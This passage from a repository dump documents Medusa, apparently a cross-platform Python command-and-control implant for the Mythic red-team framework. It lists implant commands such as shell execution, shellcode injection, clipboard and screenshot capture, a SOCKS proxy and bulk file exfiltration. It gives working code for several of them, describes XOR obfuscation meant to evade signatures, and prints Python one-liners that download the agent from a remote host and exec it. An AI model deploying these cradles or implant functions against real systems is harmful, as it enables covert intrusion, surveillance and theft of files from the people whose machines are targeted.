    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n\n            let folder = {\n                backgroundColor: \"mediumpurple\",\n                color: \"white\"\n              };\n            let file = {};\n\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            let entries = data[\"recents\"];\n            let output_table = [];\n            \n            for(let i = 0; i < entries.length; i++){\n\n                var icon = \"\";\n                var rs = {};\n\n                if (entries[i][\"type\"] == \"folder\") {\n                    icon = 'closedFolder';\n                    rs = folder;\n                } else {\n                    icon = 'code/source';\n                    rs = file;\n                }\n\n                \n\n                output_table.push({\n                    \"Name\":{\n                        \"plaintext\": entries[i][\"path\"],\n                        \"startIcon\": icon\n                    },\n                    \"rowStyle\": rs,\n                })\n            }\n            return {\n                \"table\": [\n                    {\n                        \"headers\": [\n                            {\"plaintext\": \"Name\", \"type\": \"string\", \"fillWidth\": true},\n                        ],\n                        \"rows\": output_table,\n                        \"title\": \"Recent VSCode Files\"\n                    }\n                ]\n            }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n 
         }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/rabbitmq_config.json",
    "content": "{\r\n    \"username\": \"mythic_user\",\r\n    \"password\": \"mythic_password\",\r\n    \"virtual_host\": \"mythic_vhost\",\r\n    \"host\": \"127.0.0.1\",\r\n    \"name\": \"hostname\",\r\n    \"rabbitmq_password\": \"rabbitmq_password\",\r\n    \"rabbitmq_host\": \"127.0.0.1\",\r\n    \"mythic_server_host\": \"127.0.0.1\",\r\n    \"container_files_path\": \"/Mythic/\"\r\n}\r\n"
  },
  {
    "path": "README.md",
    "content": "<p align=\"center\">\n  <img alt=\"Medusa Logo\" src=\"agent_icons/medusa.svg\" height=\"30%\" width=\"30%\">\n</p>\n\n# Medusa\n\nMedusa is a cross-platform agent compatible with both Python 3.8 and Python 2.7.\n\n## Installation\nTo install Medusa, you'll need Mythic v3 installed on a remote computer. You can find installation instructions for Mythic at the [Mythic project page](https://github.com/its-a-feature/Mythic/).\n\nFrom the Mythic install root, run the command:\n\n`./mythic-cli install github https://github.com/MythicAgents/Medusa.git`\n\nOnce installed, restart Mythic to build a new agent.\n\n## RabbitMQ Config Notes\n\nThe file [Payload_Type/medusa/rabbitmq_config.json](Payload_Type/medusa/rabbitmq_config.json) is a template and must match your Mythic environment.\n\n- Set `rabbitmq_password` to your Mythic `RABBITMQ_PASSWORD` value (typically from Mythic `.env`).\n- Set `rabbitmq_host` to your RabbitMQ host/container name (often `mythic_rabbitmq` in docker-compose setups, or `127.0.0.1` for local binds).\n- Set `mythic_server_host` to your Mythic server host/container name (often `mythic_server` in docker-compose setups, or `127.0.0.1` for local binds).\n\n## Notable Features\n- Dynamic loading/unloading of agent functions to limit exposure of agent capabilities on-disk.\n- Loading of Python modules in-memory for use in custom scripts.\n- Cross-platform SOCKS5 proxy\n- macOS clipboard reader, screenshot grabber and TCC database parsing\n- File browser compatibility with upload/download\n- Eval() of dynamic Python code\n- Basic Authentication Proxy compatibility\n\n## Commands Manual Quick Reference\n\nThe base agent and included commands all use built-in Python libraries, so do not need additional packages to function. 
Agents will run the commands in threads, so long-running uploads or downloads won't block the main agent.\n\n### General Commands\n\nCommand | Syntax | Description\n------- | ------ | -----------\ncat | `cat path/to/file` | Read and output file content.\ncd | `cd [.. dir]` | Change working directory (`..` to go up one directory).\ncp | `cp src_file_or_dir dst_file_or_dir` | Copy file or folder to destination.\ncwd | `cwd` | Print working directory.\ndownload | `download [path]` | Download a file from the target system.\ndownload_bulk | `download_bulk [path1] [path2] ...` | Download multiple files from the target system in one task.\nexit | `exit` | Exit a callback.\nenv | `env` | Print environment variables.\neval_code | `eval_code [commands]` | Execute python code and return output.\njobkill | `jobkill [task id]` | Send stop signal to long running task.\njobs | `jobs` | List long-running tasks, such as downloads.\nlist_modules | `list_modules [module_name]` | Lists in-memory modules or the full file listing for a specific module.\nload | `load command` | Load a new capability into an agent.\nload_module | `load_module` | Load a zipped Python module into memory (adapted from [here](https://github.com/sulinx/remote_importer) and [here](https://github.com/EmpireProject/EmPyre/blob/master/data/agent/agent.py#L464)).\nload_script | `load_script` | Load and execute a Python script through the agent.\nls | `ls [. path]` | List files and folders in `[path]` or use `.` for current working directory.\nmv | `mv src_file_or_dir dst_file_or_dir` | Move file or folder to destination.\npip_freeze | `pip_freeze` | Programmatically list installed packages on system.\nrm | `rm file_or_dir` | Delete file or folder.\nshell | `shell [command]` | Run a shell command which will spawn using subprocess.Popen(). 
Note that this will wait for command to complete so be careful not to block your agent.\nsocks | `socks start/stop [port]` | Start/stop SOCKS5 proxy through Medusa agent.\nsleep | `sleep [seconds] [jitter percentage]` | Set the callback interval of the agent in seconds.\nunload | `unload command` | Unload an existing capability from an agent.\nunload_module | `unload_module module_name` | Unload a Python module previously loaded into memory.\nupload | `upload` | Upload a file to a remote path on the machine.\nwatch_dir | `watch_dir path seconds` | Watch for changes in target directory, polling for changes at a specified rate.\n\n\n### macOS Commands\n\nCommand | Syntax | Description\n------- | ------ | -----------\nclipboard | `clipboard` | Output contents of clipboard (uses Objective-C API, as outlined by Cedric Owens [here](https://github.com/cedowens/MacC2/blob/main/client.py#L90). macOS only, Python 2.7 only).\nlist_apps | `list_apps` | List macOS applications (Python 2.7 only, macOS only).\nlist_tcc | `list_tcc [path]` | List entries in macOS TCC database (requires full-disk access and Big Sur only atm).\nscreenshot | `screenshot` | Take a screenshot (uses Objective-C API, macOS only, Python 2.7 only).\nspawn_jxa | `spawn_jxa` | Spawn an `osascript` process and pipe Javascript content to it.\nvscode_list_recent | `vscode_list_recent [state_db]` | Lists files and folders recently opened with VSCode.\nvscode_open_edits | `vscode_open_edits [backup_dir_path]` | Lists unsaved changes made to files in VSCode.\nvscode_watch_edits | `vscode_watch_edits [path to remote dir] [poll_interval]` | Poll the VSCode backups directory at a given interval for unsaved edits.\n\n### Windows Commands\n\nCommand | Syntax | Description\n------- | ------ | -----------\nshinject | `shinject` | Inject shellcode into target PID using CreateRemoteThread (Windows only - adapted from [here](https://gist.github.com/RobinDavid/9214020)).\nload_dll | `load_dll dll_path dll_export` | Load an 
on-disk DLL and execute an exported function (NOTE: This DLL must return an int value on completion, an msfvenom-created DLL, for example, will kill your agent upon completion).\nlist_dlls | `list_dlls [pid]` | Read process memory (PEB) of local or target process to fetch list of loaded DLLs (Python 3 only)\nps | `ps` | Get limited process information, e.g. PID, process names, architecture and binary paths (Python 3 only)\nps_full | `ps_full` | Get full process information, including PPID, integrity level and command line (Python 3 only)\nkill | `kill` | Terminate a process by process ID (Python 3 only)\n\n\n## Python Versions\n\nBoth versions of the Medusa agent use an AES256 HMAC implementation written with built-in libraries (adapted from [here](https://github.com/boppreh/aes)), removing the need for any additional dependencies beyond a standard Python install. As such the agent should operate across Windows, Linux and macOS hosts. It's worth mentioning that this crypto implementation does introduce some overhead when handling large files (screenshotting, downloads, etc.) but it's workable.\n\n### Py2 vs Py3 Commands\n\nWithin the `Payload_Type/Medusa/agent_code` directory, you will see `base_agent` files with both `py2` and `py3` suffixes. Likewise, similar file extensions can be seen for individual function files too.\n\nThese are read by the `builder.py` script to firstly select the right base Python version of the Medusa agent. `builder.py` will then include commands that are specific to the chosen python version. In the case where a command only has a `.py` extension, this will be used by default, with the assumption being that no alternative code is needed between the Py2 and Py3 versions.\n\n## Threaded Jobs\n\nMedusa uses basic threading for job execution. Where jobs are potentially long-running, they can be implemented with a 'stop check' to respond to a signal from the `jobkill` task. 
This can be implemented with a code snippet similar to that shown below:\n```\nif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n  # Some job-specific tidy up\n  return \"Job stopped.\"\n```\nThis handler can be seen implemented within the `download`, `upload`, `watch_dir` and `screenshot` commands.\n\nAdditionally, if the long-running job is expected to provide continuous output, the `sendTaskOutputUpdate` function - included in the base agent - can be used to update Mythic prior to the task completion. A dummy function that provides continuous output and can be `jobkill`'d can be seen below.\n\n```\ndef dummyFunction(self, task_id):\n  while(True):\n      # Check if we've got a stop signal.\n      if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n\n      # Send output back to Mythic\n      self.sendTaskOutputUpdate(task_id, \"We're still running\")\n\n      time.sleep(10)\n```\n\n## Supported C2 Profiles\n\nMedusa currently supports two C2 profiles: `http` (both with and without AES256 HMAC encryption) and `azure_blob`.\n\n### HTTP Profile\n\nThe HTTP profile calls back to the Mythic server over the basic, non-dynamic profile. GET requests for taskings, POST requests with responses.\n\n## Thanks\n\n- Browser scripts and agent code adapted from [@its_a_feature_](https://twitter.com/its_a_feature_) and [@djhohnstein](https://twitter.com/djhohnstein).\n- [MacC2](https://github.com/cedowens/MacC2/) and [this](https://medium.com/red-teaming-with-a-blue-team-mentality/making-objective-c-calls-from-python-standard-libraries-550ed3a30a30) blog post from Cedric Owens\n- [EmPyre](https://github.com/EmpireProject/EmPyre/) and [this](https://www.xorrior.com/In-Memory-Python-Imports/) blog post from Chris Ross.\n- The crypto wizardry found [here](https://github.com/boppreh/aes).\n- Agent icon from [flaticon.com](https://www.flaticon.com)\n"
  },
  {
    "path": "config.json",
    "content": "{\n\t\"exclude_payload_type\": false,\n\t\"exclude_c2_profiles\": false,\n\t\"exclude_documentation_payload\": false,\n\t\"exclude_documentation_c2\": true,\n\t\"exclude_agent_icons\": false\n}\n"
  },
  {
    "path": "documentation-c2/.keep",
    "content": ""
  },
  {
    "path": "documentation-payload/.keep",
    "content": ""
  },
  {
    "path": "documentation-payload/medusa/_index.md",
    "content": "+++\ntitle = \"Medusa\"\nchapter = false\nweight = 5\n+++\n\n![logo](/agents/medusa/medusa.svg?width=200px)\n## Summary\n\nMedusa is a cross-platform Python agent compatible with Python 2.7 and 3.8.\n\n### Highlighted Agent Features\n\nPython is an incredibly popular programming language and is often installed by default on many operating systems. Python 2.7, for example, is currently available on the latest macOS installs (though expected to be discontinued).\nDefault libraries, such as `Cocoa` and `ctypes`, allow access to Objective-C APIs and functionality through Windows DLLs.\n\nThe Medusa agent itself has several key features including:\n- Support for dynamic loading/unloading of functionality to limit exposure of agent capabilities on-disk. \n- A SOCKS5 proxy compatible across Python 2.7 and 3.8, and across macOS, Windows and Linux.\n- Encrypted comms.\n- `Eval()` of Python code to dynamically extend functionality.\n\nWith the ability to execute arbitrary script on the command-line, a rudementary download cradle can be used, such as the below (notably, not proxy-aware):\n```\npython3 -c \"import urllib.request; exec(urllib.request.urlopen('https://[REMOTE_HOST]/medusa.py').read())\" &\n```\n\nOr for Python 2.7:\n```\npython -c \"import urllib2;exec(urllib2.urlopen('https://[REMOTE_HOST]/medusa.py').read())\" &\n```\n\n### Build Options\n\nThis section provides details of what each Medusa-specific build option provides\n\n#### Python Version\n\nPretty self-explanatory, select which version of Python the Medusa agent should be created for. See the Development section for details of how this works under the hood.\n\n#### Output Format\n\nMythic can provide the final agent code as a Python script, or as a Base64-encoded blob. Note that this is the last stage of the process effectively. 
So any XOR obfuscation, crypto library selection or Python version selection will take place before this.\n\n#### Cryptography library\n\nMedusa agents can be built using either a manual crypto implementation or using the non-default `cryptography` library. Given the manual implementation isn't going to be as quick or efficient as the main Python library (not to mention the extra code required), `cryptography` use might be the way to go. Though do bear in mind, it is not a default library and appears to only be installed on macOS by default.\n\n{{% notice info %}}\n Either option here won't affect the agent's ability to use encrypted comms, it is purely to specify how the encrypted comms are achieved.\n{{% /notice %}}\n\n#### XOR and Base64-encode\n\nFinally, the plaintext Medusa script can be encrypted via XOR with a randomly-generated key, before being Base64 encoded. This blob is then wrapped with an unpacker and put in an `exec()` function to ultimately run the Medusa agent. This is designed to make the agent less signaturable when on-disk. See the OPSEC section for more details.\n\n#### Verify HTTPS Certificate\n\nBy default, the web request libraries used in Medusa will fail when handling a self-signed certificate for HTTPS. This function introduces code to skip cert verification, so C2 can be established.\n\n\n### Important Notes\nEach job is executed in a new thread. Long-running jobs can be viewed with the `jobs` command and, where a 'stop' functionality has been implemented, they can be killed with `jobkill`.\n\n## Authors\n@ajpc500\n\n\n"
  },
  {
    "path": "documentation-payload/medusa/c2_profiles/Azure_Blob.md",
    "content": "+++\ntitle = \"Azure Blob\"\nchapter = false\nweight = 103\n+++\n\n## Summary\nThe `medusa` agent supports Azure Blob Storage as a transport profile.\n\nTasking and responses are exchanged through blobs in the provisioned container:\n\n- Agent uploads request blobs to `ats/<message_id>.blob`\n- Agent polls and downloads response blobs from `sta/<message_id>.blob`\n- Agent deletes processed response blobs after retrieval\n\nAt build time, Medusa calls the `azure_blob` service to provision scoped configuration and stamps the generated values into the payload.\n\n### Profile Option Deviations\n\n#### Callback Interval / Jitter\nThe Azure Blob transport uses callback interval and jitter to control polling cadence for `sta/` response blobs.\n\n#### HTTPS Verification\nIf Medusa build parameter `https_check` is set to `No`, TLS certificate verification is disabled for blob operations.\n\n### Build-Time Notes\n\nWhen `azure_blob` is selected, Medusa:\n\n1. Requests configuration from the `azure_blob` service (`generate_config` RPC)\n2. Embeds:\n   - blob endpoint\n   - container name\n   - scoped SAS token\n3. Uses the core+transport template assembly process to generate the final payload\n"
  },
  {
    "path": "documentation-payload/medusa/c2_profiles/HTTP.md",
    "content": "+++\ntitle = \"HTTP\"\nchapter = false\nweight = 102\n+++\n\n## Summary\nThe `medusa` agent uses a series of `POST` web requests to send responses for tasking and a series of `GET` requests to get tasking from the Mythic server. \n\n### Profile Option Deviations\n\n#### Callback Host\nThe URL for the redirector or Mythic server. This must include the protocol to use (e.g. `http://` or `https://`).\n"
  },
  {
    "path": "documentation-payload/medusa/c2_profiles/_index.md",
    "content": "+++\ntitle = \"C2 Profiles\"\nchapter = true\nweight = 25\npre = \"<b>4. </b>\"\n+++\n\n# Supported C2 Profiles\n\nThis section goes into any `medusa` specifics for the supported C2 profiles.\n\nCurrent supported profiles:\n\n- HTTP\n- Azure Blob\n"
  },
  {
    "path": "documentation-payload/medusa/commands/_index.md",
    "content": "+++\ntitle = \"Commands\"\nchapter = true\nweight = 15\npre = \"<b>2. </b>\"\n+++\n\n# medusa command reference\n\nThese pages provide in-depth documentation and code samples for the `medusa` commands."
  },
  {
    "path": "documentation-payload/medusa/commands/cat.md",
    "content": "+++\ntitle = \"cat\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nOutputs the string content of a given file. No need for quotes and relative paths are fine.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path_to_read\n\n- Description: path to file we're going to read from\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\ncat /path/to/file\n```\n\n## MITRE ATT&CK Mapping\n\n- T1005  \n\n## Detailed Summary\n\nPrints the contents of a file on the target system:\n\n```Python\n    def cat(self, task_id, path):\n        file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        \n        with open(file_path, 'r') as f:\n            content = f.readlines()\n            return ''.join(content)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/cd.md",
    "content": "+++\ntitle = \"cd\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nChange the current working directory to another directory. No quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path\n\n- Description: path to change directory to  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n### Without Popup Option\n```\ncd ../path/here\n```\n\n## MITRE ATT&CK Mapping\n\n- T1083\n\n## Detailed Summary\nYou can either type `cd` and get a popup to fill in the path, or provide the path on the command line. \n\n```Python\n    def cd(self, task_id, path):\n        if path == \"..\":\n            self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep))\n        else:\n            self.current_directory = path if path[0] == os.sep \\\n                else os.path.abspath(os.path.join(self.current_directory,path))\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/clipboard.md",
    "content": "+++\ntitle = \"clipboard\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nGet all the types of contents on the clipboard, return specific types, or set the contents of the clipboard. \n\n{{% notice warning %}}\n Root does _*NOT*_ have a clipboard\n{{% /notice %}}\n \n- Needs Admin: False  \n- Version: 1\n- Author: @ajpc500\n\n### Reading Clipboard\n\n```\nclipboard\n```\nThis will read the plaintext data on the clipboard only. Any non-text content will be omitted.\n\n## MITRE ATT&CK Mapping\n\n- T1115  \n\n## Detailed Summary\n\nThis uses Objective C API calls to read all the types available on the general clipboard for the current user. The clipboard on macOS has a lot more data than _just_ what you copy. All of that data is collected and returned in a JSON blob of key:base64(data). To do this, we use this JavaScript code:\n```JavaScript\nlet pb = $.NSPasteboard.generalPasteboard;\nlet types = pb.types.js;\nlet clipboard = {};\nfor(let i = 0; i < types.length; i++){\n    let typejs = types[i].js;\n    clipboard[typejs] = pb.dataForType(types[i]);\n    if(clipboard[typejs].js !== undefined){\n        clipboard[typejs] = clipboard[typejs].base64EncodedStringWithOptions(0).js;\n    }else{\n        clipboard[typejs] = \"\";\n    }\n}\n```\nThere's a browserscript for this function that'll return all of the keys and the plaintext data if it's there.\n"
  },
  {
    "path": "documentation-payload/medusa/commands/cp.md",
    "content": "+++\ntitle = \"cp\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nCopy a given file or folder to a specified location. No quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### source_path\n\n- Description: path of file/folder to copy\n- Required Value: True  \n- Default Value: None  \n\n#### dest_path\n\n- Description: path to copy file/folder to  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n### Without Popup Option\n```\ncp path/of/file_or_folder /dest/to/copy/to \n```\n\n## Detailed Summary\nYou can either type `cp` and get a popup to fill in the paths, or provide the paths on the command line. \n\n```Python\n    def cp(self, task_id, source, destination):\n        import shutil\n\n        source_path = source if source[0] == os.sep \\\n                else os.path.join(self.current_directory,source)\n\n        dest_path = destination if destination[0] == os.sep \\\n                else os.path.join(self.current_directory,destination)\n\n        if os.path.isdir(source_path):\n            shutil.copytree(source_path, dest_path)\n        else:\n            shutil.copy(source_path, dest_path)\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/cwd.md",
    "content": "+++\ntitle = \"cwd\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nPrints the current working directory for the agent \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\ncwd\n```\n\n## MITRE ATT&CK Mapping\n\n- T1083  \n\n## Detailed Summary\n\nPrints the variable value used by Medusa to track current directory:\n\n```Python\n    def cwd(self, task_id):\n        return self.current_directory\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/download.md",
    "content": "+++\ntitle = \"download\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nDownload a file from the target machine. \n     \n- Python Versions Supported: 2.7, 3.8     \n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### remote_path\n\n- Description: /remote/path/on/victim.txt  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\ndownload /remote/path\n```\n\n## MITRE ATT&CK Mapping\n\n- T1020\n- T1030\n- T1041\n\n## Detailed Summary\nThis function uses API calls to chunk and transfer a file from the agent:\n\n```Python\n    def download(self, task_id, file):\n        file_path = file if file[0] == os.sep \\\n                else os.path.join(self.current_directory,file)\n\n        file_size = os.stat(file_path).st_size \n        total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n\n        data = {\n            \"action\": \"post_response\", \n            \"responses\": [\n            {\n                \"task_id\": task_id,\n                \"total_chunks\": total_chunks,\n                \"full_path\": file_path,\n                \"chunk_size\": CHUNK_SIZE\n            }]\n        }\n        initial_response = self.postMessageAndRetrieveResponse(data)\n        chunk_num = 1\n        with open(file_path, 'rb') as f:\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                content = f.read(CHUNK_SIZE)\n                if not content:\n                    break # done\n\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"chunk_num\": chunk_num,\n                            \"file_id\": initial_response[\"responses\"][0][\"file_id\"],\n                            \"chunk_data\": 
base64.b64encode(content).decode(),\n                            \"task_id\": task_id\n                        }\n                    ]\n                }\n                chunk_num+=1\n                response = self.postMessageAndRetrieveResponse(data)\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/download_bulk.md",
    "content": "+++\ntitle = \"download_bulk\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nBulk download file(s), director(ies), or a mix from the target machine.\n\nTwo modes are supported:\n\n- **archive** *(default)*: all files are bundled into a single in-memory zip archive that is streamed back to the Mythic server. The archive is never written to disk on the target.\n- **iterative**: each file is transferred individually using the same chunked approach as the `download` command.\n\nThe command automatically detects whether each supplied path is a file or a directory. When a directory is specified, all files within it (recursively) are included. Files that do not exist or are not accessible are skipped rather than causing the entire task to fail.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False\n- Version: 1\n- Author: @maclarel\n\n### Arguments\n\n#### path\n\n- Description: An array of file or directory paths to download. Multiple entries can be added through the Mythic UI or provided as a JSON array.\n- Required Value: True\n- Default Value: None\n\n#### mode\n\n- Description: `archive` (default) to bundle everything into a single in-memory zip, or `iterative` to transfer each file individually.\n- Required Value: False\n- Default Value: `archive`\n\n## Usage\n\nDownload an entire directory as a zip archive (default mode):\n\n```\ndownload_bulk {\"path\": [\"/remote/directory\"], \"mode\": \"archive\"}\n```\n\nDownload a single file using archive mode:\n\n```\ndownload_bulk {\"path\": [\"/remote/path/to/file.txt\"]}\n```\n\nDownload multiple specific files iteratively:\n\n```\ndownload_bulk {\"path\": [\"/remote/file1.txt\", \"/remote/file2.txt\"], \"mode\": \"iterative\"}\n```\n\nDownload a directory, sending each file individually:\n\n```\ndownload_bulk {\"path\": [\"/remote/directory\"], \"mode\": \"iterative\"}\n```\n\n## MITRE ATT&CK Mapping\n\n- T1020\n- T1030\n- T1041\n\n## Detailed Summary\n\nThe 
`download_bulk` function extends the single-file `download` capability to support bulk transfers.\n\n### Path detection\n\nThe `path` argument accepts an array of paths. Each entry is resolved using `os.path.isdir` and `os.path.isfile`. Relative paths are resolved against the agent's current working directory:\n\n- **Directory** – the directory tree is walked with `os.walk`; every file found is added to the transfer list.\n- **File** – added directly to the transfer list.\n- **Non-existent** – skipped with a warning message; the task continues with remaining files.\n\n### Archive mode\n\nAn in-memory `zipfile.ZipFile` (backed by `io.BytesIO`) is created and populated with all target files. The zip data is then chunked and sent to the Mythic server using the same `download` API used by the single-file `download` command.\n\nNote: This can be extremely slow to transfer larger amounts of data due to chunking. Expect to take a walk or a nap if you're trying to pull thousands of files/hundreds of MB of data.\n\nDirectory structure is preserved inside the zip using `os.path.relpath` to compute each entry's arcname:\n\n- **Directory input** (e.g. `/etc/nginx`): entries are anchored at the parent directory, so the top-level name is included — `nginx/nginx.conf`, `nginx/conf.d/default.conf`.\n- **Single file input**: only the filename is stored (`passwd`).\n- **Explicit list input**: entries are anchored at the filesystem root, preserving the full path — `etc/passwd`, `home/user/report.txt`.\n\n### Iterative mode\n\nEach file is transferred individually in the same chunked manner as the existing `download` command. 
A separate `file_id` is obtained from Mythic for each file, and the agent streams each one to completion before moving on to the next.\n\n```Python\n    def download_bulk(self, task_id, path, mode=\"archive\"):\n        import zipfile, io\n\n        # Build file list from path array (files, directories, or mix)\n        ...\n\n        if mode == \"iterative\":\n            for file_path in file_list:\n                # chunk and send each file (same as download())\n                ...\n        else:\n            # Build in-memory zip\n            zip_buffer = io.BytesIO()\n            with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:\n                for file_path in file_list:\n                    zf.write(file_path, arcname)\n            # chunk and send zip_buffer.getvalue()\n            ...\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/env.md",
    "content": "+++\ntitle = \"env\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nPrints the environment variables for the current process\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\nenv\n```\n\n## Detailed Summary\n\nLists the contents of the `os.environ` list:\n\n```Python\n    def env(self, task_id):\n        return \"\\n\".join([\"{}: {}\".format(x, os.environ[x]) for x in os.environ])\n \n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/eval_code.md",
    "content": "+++\ntitle = \"eval_code\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nSend and interpret new Python code.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### code\n\n- Description: code to execute\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\neval_code {code to execute}\n```\n\n## Detailed Summary\n\nUses the `eval()` function to interpret a string containing arbitrary Python code:\n\n```Python\n    def eval_code(self, task_id, command):\n        return eval(command)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/exit.md",
    "content": "+++\ntitle = \"exit\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis exits the current Medusa agent. \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nexit\n```\n\n\n## Detailed Summary\n\nThe command executes this call:\n```Python\n    def exit(self, task_id):\n        os._exit(0)\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/jobs.md",
    "content": "+++\ntitle = \"jobs\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nLists the currently running jobs (aka long-running functions) for our agent.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\njobs\n```\n\n## Detailed Summary\n\nLists the long-running functions running for our agent, this omits the main thread, the jobs function itself and any threads associated with the SOCKS proxy (outside of the main SOCKS thread, which we do include):\n\n```Python\n    def jobs(self, task_id):\n        out = [t.name.split(\":\") for t in threading.enumerate() \\\n            if t.name != \"MainThread\" and \"a2m\" not in t.name \\\n            and \"m2a\" not in t.name and t.name != \"jobs:{}\".format(task_id) ]\n        if len(out) > 0: return { \"jobs\": out }\n        else: return \"No long running jobs!\"\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/kill.md",
    "content": "+++\ntitle = \"kill\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to terminate a process with a specified PID.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nkill process_id\n```\n\n\n## Detailed Summary\nThis function takes a given PID and attempts to open a process handle and terminate it.\n\n```Python\n    def kill(self, task_id, process_id):\n        import ctypes, ctypes.wintypes\n        from ctypes import GetLastError\n\n        NTSTATUS = ctypes.wintypes.LONG\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n        \n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        TerminateProcess = Kernel32.TerminateProcess\n        TerminateProcess.restype = ctypes.wintypes.BOOL\n\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n        \n        try:\n            hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id)\n            if hProcess:\n                TerminateProcess(hProcess, 1)\n                CloseHandle(hProcess)    \n        except Exception as e:\n            return e\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/list_apps.md",
    "content": "+++\ntitle = \"list_apps\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses NSApplication.RunningApplications API to get information about running applications.\n\n- Python Versions Supported: 2.7\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nlist_apps\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nThis is different than executing `ps` in a terminal since this only reports back running applications, not _all_ processes running on a system.\n\n```Python\n    def list_apps(self, task_id):\n        from Cocoa import NSWorkspace\n        app_json = []\n        apps = NSWorkspace.sharedWorkspace().runningApplications()\n        for app in apps:\n            try:\n                app_data = { \"pid\": str(app.processIdentifier()), \"name\": str(app.localizedName()), \"exec_url\": str(app.executableURL()) }\n                app_json.append(app_data)\n            except: pass\n        return { \"apps\": app_json }\n\n```\n\nThis output is turned into a sortable table via a browserscript.\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/list_dlls.md",
